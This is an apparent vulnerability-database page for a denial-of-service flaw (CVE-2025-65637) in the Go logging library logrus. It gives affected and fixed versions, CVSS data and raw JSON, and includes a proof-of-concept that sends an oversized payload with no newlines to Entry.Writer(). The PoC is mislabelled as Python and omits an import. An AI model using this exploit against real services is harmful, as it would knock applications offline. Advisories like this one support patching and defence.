Security Vulnerability Report
中文
CVE-2025-65637 CVSS 7.5 HIGH

CVE-2025-65637

Published: 2025-12-04 19:16:05
Last Modified: 2025-12-23 00:26:01
Source: [email protected]

Description

A denial-of-service vulnerability exists in github.com/sirupsen/logrus when using Entry.Writer() to log a single-line payload larger than 64KB without newline characters. Due to limitations in the internal bufio.Scanner, the read fails with "token too long" and the writer pipe is closed, leaving Writer() unusable and causing application unavailability (DoS). This affects versions < 1.8.3, 1.9.0, and 1.9.2. The issue is fixed in 1.8.3, 1.9.1, and 1.9.3+, where the input is chunked and the writer continues to function even if an error is logged.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:turbopuffer:logrus:*:*:*:*:*:go:*:* - VULNERABLE
cpe:2.3:a:turbopuffer:logrus:1.9.0:*:*:*:*:go:*:* - VULNERABLE
cpe:2.3:a:turbopuffer:logrus:1.9.2:*:*:*:*:go:*:* - VULNERABLE
github.com/sirupsen/logrus < 1.8.3
github.com/sirupsen/logrus = 1.9.0
github.com/sirupsen/logrus = 1.9.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-65637 PoC - logrus Entry.Writer() DoS // This PoC demonstrates the DoS vulnerability in logrus < 1.8.3, 1.9.0, 1.9.2 package main import ( "fmt" "github.com/sirupsen/logrus" ) func generateLargePayload(size int) []byte { // Generate payload larger than 64KB without newline characters payload := make([]byte, size) for i := range payload { payload[i] = 'A' } return payload } func main() { log := logrus.New() // Create an entry with the logger entry := &logrus.Entry{ Logger: log, Time: time.Now(), Level: logrus.InfoLevel, Message: "test", } // Get the writer from the entry writer := entry.Writer() // Generate payload larger than 64KB (bufio.Scanner default max token size) // 64KB = 65536 bytes largePayload := generateLargePayload(70000) // 70KB payload // Write the large payload without newline // This will trigger "token too long" error and close the pipe n, err := writer.Write(largePayload) fmt.Printf("Written %d bytes, error: %v\n", n, err) // After the error, writer.Write() will return error because pipe is closed // Try to write normal data - this will fail _, err = writer.Write([]byte("normal log message\n")) fmt.Printf("Second write error: %v\n", err) // The Writer is now permanently unusable (DoS condition) } // Mitigation: Add newlines to split large payloads or upgrade to fixed versions // Fixed versions: v1.8.3, v1.9.1, v1.9.3+ // The fix chunks the input and continues functioning even if an error is logged

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65637", "sourceIdentifier": "[email protected]", "published": "2025-12-04T19:16:05.223", "lastModified": "2025-12-23T00:26:00.703", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A denial-of-service vulnerability exists in github.com/sirupsen/logrus when using Entry.Writer() to log a single-line payload larger than 64KB without newline characters. Due to limitations in the internal bufio.Scanner, the read fails with \"token too long\" and the writer pipe is closed, leaving Writer() unusable and causing application unavailability (DoS). This affects versions < 1.8.3, 1.9.0, and 1.9.2. The issue is fixed in 1.8.3, 1.9.1, and 1.9.3+, where the input is chunked and the writer continues to function even if an error is logged."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:turbopuffer:logrus:*:*:*:*:*:go:*:*", "versionEndExcluding": "1.8.3", "matchCriteriaId": "B302F48C-A8EA-4FAB-B151-F8492365896C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:turbopuffer:logrus:1.9.0:*:*:*:*:go:*:*", "matchCriteriaId": "25373732-88E0-4824-B243-9C1E82608B1C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:turbopuffer:logrus:1.9.2:*:*:*:*:go:*:*", "matchCriteriaId": "E59CDE4C-3669-4EA6-AA2D-9BE99FDEC497"}]}]}], "references": [{"url": "https://github.com/mjuanxd/logrus-dos-poc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/mjuanxd/logrus-dos-poc/blob/main/README.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/sirupsen/logrus/issues/1370", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Patch"]}, {"url": "https://github.com/sirupsen/logrus/pull/1376", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/sirupsen/logrus/releases/tag/v1.8.3", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/sirupsen/logrus/releases/tag/v1.9.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/sirupsen/logrus/releases/tag/v1.9.3", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMSIRUPSENLOGRUS-5564391", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.